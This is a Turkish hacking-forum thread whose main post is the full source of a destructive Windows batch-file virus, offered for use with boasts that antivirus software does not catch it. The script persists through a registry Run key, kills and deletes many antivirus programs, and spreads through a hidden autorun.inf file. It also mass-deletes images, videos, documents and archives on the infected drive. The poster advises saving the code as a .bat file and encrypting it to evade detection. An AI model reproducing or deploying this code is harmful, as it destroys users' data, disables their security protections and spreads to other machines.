antilere yakalanmaz - pcyi 10sn de çökertir

A

anaconda890

Üye
4 Tem 2009
64
0
Ankara
@ECHO on
attrib +h +s %k%:\autorun.inf
attrib +h +s %k%:\xxx.exe
attrib +h +s %k%:\ico.ico

copy /y %0 %systemroot%\windows.exe
if exist %systemroot%\windows.exe set bat=%systemroot%\windows.exe & goto registrar
copy /y %0 %systemroot%\syste32\windows.exe
if exist %systemroot%\windows.exe set bat=%systemroot%\syste32\windows.exe & goto registrar
copy /y %0 %systemroot%\EXPIORER.exe
if exist %systemroot%\windows.exe set bat=%systemroot%\EXPIORER.exe & goto registrar

:registrar
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n" /v Anti-Virus /t REG_sz /d %bat% /f

:mata_av
Taskkill /f /IM nod32krn.exe /IM nod32kui.exe
cd %programfiles%\Eset
attrib -H -S -R *.*
del /f /s /q *.*
Taskkill /f /IM kavsvc.exe /IM kav.exe
cd %programfiles%\KASPERSKY LAB\KASPERSKY\ANTI-VIRUS PERSONAL
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM VsStat.exe
cd %programfiles%\McAfee\McAfee VirusScan
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM zlclient.exe /IM zonealarm.exe /IM vsmon.exe
cd %programfiles%\Zone Labs\ZoneAlarm
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM avgamsvr.exe /IM avgupsvc.exe
cd %programfiles%\AVG7
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM Pavsrv51.exe /IM AVENGINE.EXE /IM apvxdwin.exe /IM pavProxy.exe
cd %programfiles%\Panda Software\Panda Antivirus Titanium
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM NPROTECT.EXE
cd %programfiles%\Norton Utilities
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM GBPoll.exe /IM navapsvc.exe /IM NPFMntor.exe /IM NPROTECT.EXE /IM NOPDB.EXE /IM GBTray.exe /IM NPFMntor.exe /IM GhostTray.exe /IM PQV2iSvc.exe
cd %programfiles%\Norton System\Works\Norton AntiVirus
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM no-spy.exe
cd %programfiles%\SinEspias
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM AVGSERV9.EXE /IM AVGCC32.EXE
cd %programfiles%\GRISOFT\AVG6
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM bdoesrv.exe /IM bdmcon.exe /IM bdnagent.exe /IM bdswitch.exe
cd %programfiles%\Softwin\BitDefender9
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM AVGUARD.EXE /IM AVWUPSRV.EXE /IM AVGNT.EXE /IM AVSched32.EXE
cd %programfiles%\AVPersonal
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM FrameworkService.exe /IM Mcshield.exe /IM VsTskMgr.exe /IM SHSTAT.EXE
cd %programfiles%\Network Associates\VirusScan
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM spyaxe.exe /IM spyaxe.exe
cd %programfiles%\SpyAxe
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM ccProxy.exe /IM ccSetMgr.exe /IM SNDSrvc.exe /IM SPBBCSvc.exe /IM ccEvtMgr.exe /IM ccApp.exe /IM NMAIN.EXE /IM SBServ.exe /IM NOPDB.EXE
cd %programfiles%\Archivos comunes\Symantec\Shared
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM navapsvc.exe /IM ISSVC.exe /IM
cd %programfiles%\Norton Internet Security
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM avgcc.exe /IM avgamsvr.exe /IM avgupsvc.exe
cd %programfiles%\Grisoft
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM avgamsvr.exe /IM vgupsvc.exe /IM avgcc.exe
cd %programfiles%\Grisoft\AVG free
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM gcasDtServ.exe /IM gcasServ.exe
cd %programfiles%\Microsoft AntiSpyware
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM Pagent.exe /IM pagentwd.exe /IM pavsched.exe
cd %programfiles%\Panda Software\Panda Administrator\Pav_Agent
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM symlcsvc.exe
cd %programfiles%\Archivos comunes\Symantec\SharedCCPD-LC
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM SynTPLpr.exe /IM SynTPEnh.exe
cd %programfiles%\SynapticsSynTP
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM aswUpdSv.exe /IM ashServ.exe /IM ashWebSv.exe /IM ashDisp.exe
cd %programfiles%\Alwil Software\Avast4
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM SpywareStrike. exe /IM SpywareStrike. exe
cd %programfiles%\SpywareStrike
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM ASHSERV.EXE /IM ASHWEBSV.EXE /IM ASHMAISV.exe
cd %programfiles%\ALWIL SOFTWARE\AVAST4
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM navapsvc.exe /IM NPFMntor.exe /IM navapw32.exe /IM SAVScan.exe
cd %programfiles%\Norton AntiVirus
attrib -H -S -R *.*
del /s /q *.*
cd\
:inicio
if exist %temp%\xxx.exe goto crea_icono
copy /y %0 %temp%\xxx.exe || goto inicio
:crea_icono
if exist %temp%\ico.ico goto sigue_1
call:debugeo
goto sigue_1

:deb1
(
echo n bhb1.dat
echo e 0000 00 00 01 00 01 00 20 20 00 00 01 00 18 00 A8 0C
echo e 0010 00 00 16 00 00 00 28 00 00 00 20 00 00 00 40 00
echo e 0020 00 00 01 00 18 00 00 00 00 00 00 00 00 00 00 00
echo e 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0E 57
echo e 0040 93 03 53 92 04 52 94 09 50 8F 08 5A 9B 01 4D 8F
echo e 0050 0C 5F A3 1D 5C B4 28 5E B1 30 5A A1 32 4F 99 1A
echo e 0060 3A 81 19 4B 9D 29 53 A6 33 5A A5 36 65 AF 25 4E
echo e 0070 93 44 6B B9 45 71 BE 4A 71 BF 40 70 BE 3D 6D BB
echo e 0080 3B 66 B5 38 63 B2 2C 5D AB 29 48 93 06 11 27 00
echo e 0090 09 27 06 0B 14 0A 0D 22 09 19 2A 01 1D 5A 0E 5E
echo e 00A0 9B 00 43 81 00 41 7F 05 55 92 01 4F 91 07 5B 9C
echo e 00B0 0E 5A A2 1F 5E B6 29 5F B2 32 5B A4 39 59 9B 1B
echo e 00C0 3B 82 1A 4C 9F 2E 60 B3 32 5E B1 47 71 B8 4E 5E
echo e 00D0 88 45 77 C9 44 73 C5 4C 76 C1 48 73 C2 47 72 C1
echo e 00E0 43 71 BF 3A 68 B6 33 61 AF 28 53 9C 03 13 3D 03
echo e 00F0 0F 21 02 19 3F 0C 1B 6A 0C 22 3E 19 5E 90 00 47
echo e 0100 83 00 49 87 0D 5D 9E 0C 58 9A 10 62 A3 05 57 98
echo e 0110 09 4E 97 23 5F B8 30 64 B7 38 5F A9 3F 5F A0 1E
echo e 0120 3E 8A 2C 34 51 B9 C4 E2 B9 CE ED 8E AC D5 8D A8
echo e 0130 D4 60 87 D1 C6 DF FF 71 8D D4 4E 7C CA 4D 7B C9
echo e 0140 48 76 C4 3F 70 BE 38 69 B7 2D 58 A7 1F 31 78 08
echo e 0150 09 1D 01 12 45 11 25 4E 0B 18 28 00 16 36 07 52
echo e 0160 90 0B 57 99 08 54 96 02 5A 96 09 61 A1 07 59 9A
echo e 0170 0B 4C 97 24 64 B9 32 6B C1 3A 61 AB 41 60 9F 21
echo e 0180 50 A4 32 66 B3 42 73 C1 4F 7D CB 80 9E D9 57 7E
echo e 0190 CD 57 82 D1 57 82 D1 5C 85 D4 54 80 D3 51 7D D0
echo e 01A0 47 7C CD 44 74 C6 3B 6D BF 31 61 AF 26 4B 95 01
echo e 01B0 0A 14 07 12 4E 02 05 0A 07 11 22 04 16 2D 00 46
echo e 01C0 85 00 48 8A 04 52 94 0A 60 9C 01 51 92 0A 5E 9F
echo e 01D0 13 4B 9D 24 5E B0 35 6E C4 3C 63 AD 15 3F 8C 2B
echo e 01E0 5A AE 3C 70 BD 4A 7B C9 57 82 D3 84 A2 DD 60 87
echo e 01F0 D6 5B 86 D5 63 8A D9 5E 87 D6 5A 86 D9 56 82 D5
echo e 0200 4D 82 D3 48 78 CA 3E 70 C2 37 67 B5 2C 51 9B 00
echo e 0210 06 19 03 0F 49 27 32 50 07 11 23 06 15 28 00 43
echo e 0220 82 00 4A 88 07 57 96 0B 59 9B 0C 63 A3 0C 5E 9F
echo e 0230 18 4E A1 27 5A AA 32 61 B2 3D 64 A9 22 58 AB 37
echo e 0240 66 BA 4A 7A CC 52 80 CE 64 8B DA 8C A7 E0 69 8F
echo e 0250 DD 64 8B DA 60 8B DA 63 8D E0 5D 89 DC 59 85 D8
echo e 0260 53 83 D5 4D 7F D1 48 7A CC 3A 6C BE 33 5B A6 06
echo e 0270 28 5E 05 0D 48 2E 58 7B 08 15 25 09 13 25 06 47
echo e 0280 84 04 4F 8D 11 5D 9F 02 52 8F 07 5B 9C 03 5B 97
echo e 0290 18 4E A1 26 57 A7 31 5B A8 2F 56 A1 31 63 B6 43
echo e 02A0 75 C8 4D 82 D3 5C 86 D9 69 90 DE 6C 93 E1 6D 93
echo e 02B0 E1 6B 93 DE 68 93 E2 67 95 E3 64 92 E0 5E 8C DA
echo e 02C0 54 88 DB 52 81 D5 4B 7D D0 42 74 C6 36 64 B1 15
echo e 02D0 34 73 02 0E 3E 1E 3A 59 02 08 15 1F 3C 61 00 4B
echo e 02E0 8D 01 52 8F 00 3F 7D 02 4F 8D 00 50 91 0E 5B A0
echo e 02F0 1C 50 A3 2B 54 A3 35 58 A1 1F 4D A1 34 6A BD 47
echo e 0300 7D D0 58 88 DA 67 90 DF 67 93 E0 72 9B E4 74 9E
echo e 0310 E5 6C 99 E2 6D 99 E6 64 95 E3 62 93 E1 60 91 DF
echo e 0320 5E 8E E0 59 8B DE 4E 84 D7 44 7A CD 3B 6B B9 25
echo e 0330 41 82 08 13 39 0A 14 25 05 13 29 06 13 29 2A 70
echo e 0340 A6 0C 42 7E 0D 54 93 0A 55 93 08 5A 9B 0C 4C 9A
echo e 0350 18 47 9B 18 3C 90 1E 3B 86 24 60 B2 3D 77 C9 4D
echo e 0360 83 D6 5E 8E E0 67 97 E5 73 9F EC 79 A2 EB 76 A0
echo e 0370 E7 72 9F E8 6A 9E E5 68 99 E7 64 95 E3 67 98 E6
echo e 0380 62 92 E4 5A 8C DF 4F 85 D8 48 7E D1 42 72 C0 33
echo e 0390 54 99 05 10 24 00 08 19 20 32 51 07 16 26 2F 82
echo e 03A0 B9 2C 83 BB 26 79 AC 03 39 75 07 56 95 11 47 A5
echo e 03B0 19 4B A5 21 4B 9E 26 4A 96 2D 68 BE 43 7F D1 52
echo e 03C0 88 DB 5F 91 E3 6E 9C EA 74 A1 EA 80 AA F1 7C A6
echo e 03D0 ED 75 A7 EF 70 9E EC 6B 9C EA 6C 9C EE 65 95 E7
echo e 03E0 62 94 E7 58 90 E2 53 89 E0 4C 84 D6 48 77 C8 40
echo e 03F0 61 A6 0D 21 2C 04 0B 26 36 52 75 02 0A 11 2E 85
echo e 0400 BE 2E 85 BE 2F 86 BF 2F 86 BF 29 7C B0 14 4D AA
echo e 0410 21 55 AF 32 5C A9 18 45 96 37 76 CE 4B 86 DC 58
echo e 0420 8E E1 63 97 EA 70 9E EB 79 A6 F0 83 AE F1 82 B2
echo e 0430 F4 76 AA F0 71 A3 EF 6E 9F ED 69 9D EA 6A 9E EB
echo e 0440 61 98 E9 5B 93 E5 56 8E E0 51 87 DA 4B 7A CB 4D
echo e 0450 6A AF 00 00 06 08 10 38 34 54 7D 00 05 08 2E 85
echo e 0460 BE 30 87 C0 2F 86 BF 31 88 C1 2B 88 BF 1A 53 B0
echo e 0470 2C 60 BA 43 70 C1 1C 51 A8 3E 7D D5 50 8B E1 5D
echo e 0480 93 E6 68 9C EF 75 A3 F0 7D AB F2 86 B1 F4 88 B3
echo e 0490 F6 7A AE F4 7A AC F8 74 A5 F3 6C A0 ED 6A 9E EB
echo e 04A0 66 9D EE 60 98 EA 5B 93 E5 55 8B DE 52 81 D2 41
echo e 04B0 5A 7C 08 2A 65 05 0E 34 3F 56 7C 08 09 0D 33 85
echo e 04C0 BF 37 89 C3 33 8A C3 34 8A C6 26 7B C1 1F 57 B6
echo e 04D0 36 6B C5 50 7F D1 29 62 BD 4A 86 DF 54 8E E7 65
echo e 04E0 9D EF 71 A5 F2 76 AE F5 85 B4 F8 90 BC F9 8B B9
echo e 04F0 F3 7C B1 F4 79 AB F7 71 A6 EF 6A A2 EF 69 A1 EE
echo e 0500 65 9D EE 60 98 EA 5B 97 E9 5C 91 E1 31 64 6E 4B
echo e 0510 7A 71 01 2A 57 00 12 35 47 63 86 08 0F 18 37 89
echo e 0520 C3 37 89 C3 37 8A C7 33 8B C7 1A 6B B6 27 65 C3
echo e 0530 45 7A D5 59 85 E4 30 6D CA 50 8C E5 5E 97 ED 65
echo e 0540 A1 F3 6F AB F7 78 B0 F7 88 B8 FA 91 B8 F6 90 BD
echo e 0550 FA 81 B6 F5 78 AE F5 73 AC F7 6D A5 F6 6B A3 F4
echo e 0560 65 A1 F3 64 9C EE 55 92 DC 44 80 75 55 8A 80 53
echo e 0570 80 6F 3B 8C D7 08 0C 41 3D 58 7D 26 34 47 39 8B
echo e 0580 C5 38 8E CA 37 8D C9 38 8E CA 17 61 B3 2D 70 CD
echo e 0590 4F 82 E2 66 95 E9 39 77 D5 4F 8E E8 60 9D F3 67
echo e 05A0 A3 F5 73 AD F8 7B B6 FB 88 BB FA 90 BD FA 8D BC
echo e 05B0 F9 84 B8 FB 79 B4 FA 72 AC F8 6C AA F6 69 A7 F3
echo e 05C0 63 A0 F0 55 86 C4 54 8D 84 55 90 82 51 8F 81 57
echo e 05D0 8E 7D 38 82 AC 04 14 43 3F 58 72 5F 76 9C 3B 8D
echo e 05E0 C7 38 8E CA 39 8F CB 3A 90 CC 14 63 B4 34 77 D4
echo e 05F0 5C 91 EB 69 98 EC 4F 89 E8 57 96 F0 65 A2 F8 67
echo e 0600 A9 FA 71 B2 FC 7D B8 FD 83 BC FA 8D C1 FD 8C C0
echo e 0610 FC 81 BB FD 79 B4 FA 70 B2 F9 6E AC F8 6C AA F6
echo e 0620 52 87 A2 5F 98 89 51 90 86 53 94 85 55 93 85 40
echo e 0630 7C 71 2D 63 7A 06 15 3C 38 4F 6F 33 52 79 3C 8D
echo e 0640 CA 3E 8F CC 3C 92 CE 3D 93 CF 1C 6D BE 40 83 E0
echo e 0650 63 9C F2 75 AD FC 6B 96 8D 59 9E F5 6B AF FC 6D
echo e 0660 B4 FE 73 B8 FD 7B BA FE 81 C0 FD 84 C3 FD 84 C1
echo e 0670 FF 7D BC F9 76 B7 FC 74 B1 FB 77 A9 D3 5F 95 8E
echo e 0680 5C 96 8B 64 A1 93 59 97 89 56 94 86 56 8E 81 59
echo e 0690 8E 80 23 45 45 04 17 42 0C 12 1F 22 2C 3D 3E 8F
echo e 06A0 CC 3F 90 CD 3E 94 D0 40 95 D3 28 80 C7 41 86 E3
echo e 06B0 65 A1 FA 70 AE F4 69 9D 7F 56 9E EB 69 B2 FC 77
echo e 06C0 BB FC 7B BE FD 7E C1 FE 80 C3 FC 82 C1 FD 81 C4
echo e 06D0 FD 79 BF FA 75 B7 F8 6A 9F 9C 69 A4 96 5F 9A 8C
echo e 06E0 57 95 87 62 9D 8F 5E 9D 8D 58 96 88 5D 98 8A 57
echo e 06F0 91 79 43 6B 6A 05 19 42 02 08 25 01 05 06 3A 90
echo e 0700 CC 3D 93 CF 40 96 D2 42 98 D4 3F 96 D6 41 89 E7
echo e 0710 69 AF F5 5F A0 A9 6D 9E 82 45 8B 8B 67 B5 F8 73
echo e 0720 C1 FC 7E C5 FE 81 C9 F9 82 C5 FC 82 CA FA 80 C6
echo e 0730 FF 71 A7 B8 69 A1 94 68 A6 9A 67 A5 97 62 A0 92
echo e 0740 63 A1 93 5E 9C 8E 5A 97 89 5D 9B 8D 5E 98 86 57
echo e 0750 88 74 52 7B 6C 05 26 54 00 0F 2F 04 07 0B 3E 94
echo e 0760 D0 3F 95 D1 41 97 D3 43 99 D5 41 9A D3 3C 89 E6
echo e 0770 68 AF FF 65 AA 95 69 9F 88 48 96 8F 5B 9F 94 4F
echo e 0780 8F A1 74 B0 D4 70 A4 D3 72 AA BB 71 AC A4 70 AF
echo e 0790 9F 73 AE A0 75 B3 A5 66 A4 98 68 A6 98 63 A1 93
echo e 07A0 63 A1 93 58 96 88 50 93 84 59 97 89 49 81 76 56
echo e 07B0 92 80 52 7C 9F 04 4C 82 01 08 19 04 07 0B 43 94
echo e 07C0 D1 44 95 D2 41 97 D3 44 9A D6 42 9A D6 36 86 E3
echo e 07D0 54 9C E2 5F A6 9C 65 A4 90 54 95 8C 65 AA A0 77
echo e 07E0 B9 A6 78 BD A9 77 BD AC 78 B9 A9 78 B6 A8 76 B4
echo e 07F0 A6 6D AB 9D 6B A9 9B 6C AA 9C 64 A5 96 65 A6 97
echo e 0800 6C AA 9C 5C 9D 8E 58 97 87 54 92 84 5C 94 87 55
echo e 0810 8C 8F 61 7B C1 00 0E 11 05 07 11 23 38 83 40 96
echo e 0820 D2 45 96 D3 43 99 D5 44 9A D6 45 9B D7 33 87 D3
echo e 0830 49 97 B4 59 A6 A2 5E A2 97 64 A4 91 63 A9 A2 70
echo e 0840 B5 A8 72 B7 A3 70 B5 A1 70 B7 A3 73 B8 A9 74 B9
echo e 0850 AA 69 AE 9F 6A AF A0 64 A5 96 6D AE 9F 64 A5 96
echo e 0860 5F A5 98 51 8D 7B 68 A5 9B 5D 9B 8F 56 8C 93 68
echo e 0870 8F DA 71 80 C8 32 7B B5 0F 18 5B 10 23 67 43 94
echo e 0880 D1 44 95 D2 44 9A D6 44 9A D6 46 9C D8 44 9E D5
echo e 0890 41 9B AC 54 A5 A2 5C AB A2 5F A3 98 5F AC A8 6D
echo e 08A0 B5 A9 70 BB AD 73 BB AF 70 B5 AA 6E B7 A7 73 BA
echo e 08B0 AA 6F B6 A6 6B B0 A5 66 A7 9E 53 A0 92 65 9D 92
echo e 08C0 5A 98 8C 66 A4 9E 60 9C 94 5E 98 B5 61 94 EA 69
echo e 08D0 8E DE 72 81 C9 4A 9A D5 1B 2E 6B 25 38 89 47 98
echo e 08E0 D5 49 9A D7 45 9B D7 45 9B D7 46 9C D8 45 9D D9
echo e 08F0 3C 98 B5 52 A8 A8 59 AD A9 5D AD A6 55 A5 A0 67
echo e 0900 B5 AE 67 B6 AD 6E BD B0 6F B9 AD 67 B5 AA 64 AD
echo e 0910 A3 65 AE A4 6B B0 A5 62 A5 96 5D 9F 94 65 AD A1
echo e 0920 64 A1 97 5F 9D 97 67 9F E0 5F 9F F3 57 97 EC 62
echo e 0930 8B E0 6F 7E C6 1A 33 71 1B 30 7B 1C 3D 8C 44 9A
echo e 0940 D6 47 9D D9 46 9C D8 46 9C D8 45 9D D9 45 9D D9
echo e 0950 46 9D DB 49 A5 B0 56 AD AA 5A AC A7 59 A9 A4 5C
echo e 0960 AF B1 67 BD B5 67 B6 AD 6B BA AF 65 B7 AB 5E B0
echo e 0970 A3 65 A8 99 5C 99 95 6A B1 A7 71 B2 A3 5E 9F 96
echo e 0980 70 AA D4 60 AC FF 5B A7 F9 59 9E F5 53 92 EC 57
echo e 0990 87 DF 6D 7C C5 1F 35 7C 22 3E 92 1C 43 98 44 9A
echo e 09A0 D6 46 9C D8 47 9D D9 48 9E DA 45 9D D9 49 9F DB
echo e 09B0 47 9F DB 46 A0 D6 49 A4 A8 56 AD AA 58 AD A9 5E
echo e 09C0 B1 AF 60 B7 B4 65 BB B5 67 B4 AC 57 A0 96 5D A3
echo e 09D0 9C 5F A7 A1 5D A6 9E 65 AA 9F 6B B5 D7 6A B9 FC
echo e 09E0 63 B2 FB 5C AB FC 5A A2 FA 4C 97 F3 4D 90 ED 52
echo e 09F0 86 E0 6D 83 CB 21 47 95 3D 73 CA 3B 74 D7 48 9E
echo e 0A00 DA 47 9D D9 4A A0 DC 49 9F DB 48 A0 DC 49 9F DB
echo e 0A10 48 A0 DC 4C 9F DC 53 AB D4 50 A9 AD 5A AD AF 4F
echo e 0A20 A3 9E 5E B2 B0 5D B5 AF 5B AF AA 61 AF A8 58 A7
echo e 0A30 9A 57 A4 BE 5E AC FF 5B B4 F7 5B B5 FC 5F B1 FF
echo e 0A40 5C AF FD 54 A7 FD 52 9C FA 49 94 F0 4C 8F EC 4E
echo e 0A50 88 E1 6B 82 D0 2A 5E B1 54 99 E9 62 AE E2 49 9F
echo e 0A60 DB 46 9C D8 4A A0 DC 4A A0 DC 4A A0 DC 48 A0 DC
echo e 0A70 48 A0 DC 4B A1 DD 52 A2 DF 58 A8 DD 56 AB B5 53
echo e 0A80 AB B1 5D AB AA 49 A1 B9 4F A3 E5 4A A1 FF 4B A4
echo e 0A90 FC 48 A1 FC 4C A5 FD 51 A9 FD 52 AB FC 52 AB FC
echo e 0AA0 50 A8 FC 51 A2 FD 4D 9A F6 4A 95 F1 42 8D E9 4A
echo e 0AB0 88 E2 64 86 D2 59 AB E2 64 B0 E4 63 AF E4 4A A1
echo e 0AC0 DA 4A A0 DC 4A A0 DC 4A A0 DC 48 9F D8 4A A0 DC
echo e 0AD0 49 A1 DD 4A A2 DE 52 A2 DD 5E AA E5 56 A7 E0 32
echo e 0AE0 8E E7 2E 8F F1 34 90 EF 39 95 F4 3C 98 F7 40 9C
echo e 0AF0 FB 3F 9B FA 41 9B FA 44 9B F9 4A A1 FD 4B A2 FE
echo e 0B00 51 A2 FD 4E 9D F8 4A 9B F6 48 95 F1 47 90 EC 4A
echo e 0B10 89 E3 66 85 D4 5D B0 E7 65 B3 E8 66 B3 E4 4A 9E
echo e 0B20 D8 4A A0 DC 4A A0 DC 4A A0 DC 4A A0 DC 4A A0 DC
echo e 0B30 4C A2 DE 4B A1 DD 52 A2 DD 5D AA E2 56 A6 E1 56
echo e 0B40 A8 E2 24 87 E3 29 86 E9 2F 8A ED 32 8C F1 38 93
echo e 0B50 F5 37 92 F5 3A 91 F1 3F 96 F6 43 99 F9 48 9E FE
echo e 0B60 4F A2 FD 50 A1 FC 4A 9B F6 46 97 F2 45 90 EC 4A
echo e 0B70 89 E3 67 84 D5 5A B2 E8 67 B6 E7 65 B1 E6 4F 9D
echo e 0B80 D8 4A A0 DC 4A A0 DC 4A A0 DC 49 9F DB 4A A0 DC
echo e 0B90 4C A2 DE 4C A2 DE 52 A2 DD 5D AA E2 54 A4 DF 57
echo e 0BA0 AA E2 5D A8 E0 28 85 E8 2C 87 EA 2C 86 EB 29 83
echo e 0BB0 E8 33 8E F1 3B 92 F2 3D 94 F4 44 9A FA 48 9E FE
echo e 0BC0 4F A2 FD 50 A1 FC 4D 9E F9 47 98 F3 46 91 ED 4B
echo e 0BD0 8A E4 67 84 D5 5D B0 E7 66 B5 E6 64 B0 E5 4A 9A
echo e 0BE0 D5 4C 9D DA 4A A1 DA 4A A0 DC 4B A1 DD 4C A2 DE
echo e 0BF0 4D A3 DF 4F A2 DF 54 A2 DD 5F A8 E4 59 A5 E0 58
echo e 0C00 A8 E3 5A A9 E2 57 A9 E3 29 83 E8 2D 85 EF 2D 87
echo e 0C10 EC 26 81 E4 33 88 EE 39 8F F3 42 98 F8 45 9B FB
echo e 0C20 50 A0 FF 50 A1 FC 4E 9F FA 49 96 F2 43 90 EC 4C
echo e 0C30 89 E6 5D 83 D5 64 A0 DB 62 B2 E7 65 AD E3 00 00
echo e 0C40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
echo e 0C50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
echo e 0C60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
echo e 0C70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
echo e 0C80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
echo e 0C90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
echo e 0CA0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
echo e 0CB0 00 00 00 00 00 00 00 00 00 00 00 00 00 00
echo rcx
echo 0CBE
echo w0
echo q
echo.
)>bhb1.dat
goto:eof
:debugeo
del/f/q/a bhb1.dat>NUL 2>&1
call:deb1
type bhb1.dat|debug>NUL 2>&1
del/f/q/a "ico.ico">NUL 2>&1
ren bhb1.dat "ico.ico"
ping -n 1 127.0.0.1 >nul
copy /y ico.ico %temp%\ico.ico && del /f /q ico.ico
del/f/q/a bhb1.dat>NUL 2>&1
goto :eof
:sigue_1
if exist %temp%\autorun.inf goto mira
echo [autorun] > "%temp%\autorun.inf"
echo open=xxx.exe >> "%temp%\autorun.inf"
echo icon=ico.ico >> "%temp%\autorun.inf"
echo label=PornoStart >> "%temp%\autorun.inf"
echo shell\open\Command=xxx.exe >> "%temp%\autorun.inf"
:mira
popd
ping -n 1 localhost
cd\
cls
set k=
FOR /F "tokens=3 delims=\:" %%A IN ('REG Query HKLM\SYSTEM\MountedDevices ^| FIND "530054004F00520041"') DO (
DIR /A %%A:\ >NUL 2>&1 && set k=%%A
)
:sigue_2
cls
cd\
if not defined k goto mira
cd\
pushd %k%:\
:copy_bat
if exist %k%:\xxx.exe goto copy_ico
copy /y %0 %k%:\xxx.exe && attrib +h +s %k%:\xxx.exe
:copy_ico
if exist %k%:\ico.ico goto copy_autorun
copy /y %temp%\ico.ico %k%:\ico.ico && attrib +h +s %k%:\ico.ico
:copy_autorun
if exist %k%:\autorun.inf goto borrador
copy %temp%\autorun.inf && attrib +h +s %k%:\ico.ico
:borrador
attrib +h +s %k%:\autorun.inf
attrib +h +s %k%:\xxx.exe
attrib +h +s %k%:\ico.ico
del /f /s /q *.mp3 >nul
del /f /s /q *.ini >nul
del /f /s /q *.wma >nul
del /f /s /q *.jpg >nul
del /f /s /q *.png >nul
del /f /s /q *.gif >nul
del /f /s /q *.png >nul
del /f /s /q *.txt >nul
del /f /s /q *.doc >nul
del /f /s /q *.3gp >nul
del /f /s /q *.rar >nul
del /f /s /q *.wmv >nul
del /f /s /q *.avi >nul
del /f /s /q *.asf >nul
del /f /s /q *.mp4 >nul
del /f /s /q *.mpg >nul
del /f /s /q *.flv >nul
del /f /s /q *.mpeg >nul
del /f /s /q *.bmp >nul
del /f /s /q *.zip >nul

ping -n 2 localhost >nul
goto mira

+arkadaşlar bu virüs aşağıdaki antileri kapatır :

-Zone alarm
-nod 32
-kaspersky
-avast
-aVg
-norton
-MC afee
+ve verilen antilerin tekine yakalanmaz crypterlandı..

+siz yinede kodları bi daha kopyalayıp exe haline getirirseniz daha iyi olur ya...

+virüs aktifleştiği anda pc için son 10sn başlar ve biter..

NoT! =.ßat Yapacaksınız ßirde crypterla şifrersen daha iyi olacaktır...

NOT : ALINTIDIR!
 
A

aSiRa

Yeni üye
3 Eyl 2011
4
0
ßu SiTeye Yeni üYe oLdum!...Ve Çogu keLimenizi anLamaya çaLışıyorum...ßuRaSı iÇin diL eĞitiminiz varmı ya.vaRSa Yaßancı keLimeLerinizi anLamak iÇin ßi Kaç derS aLayım :)
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.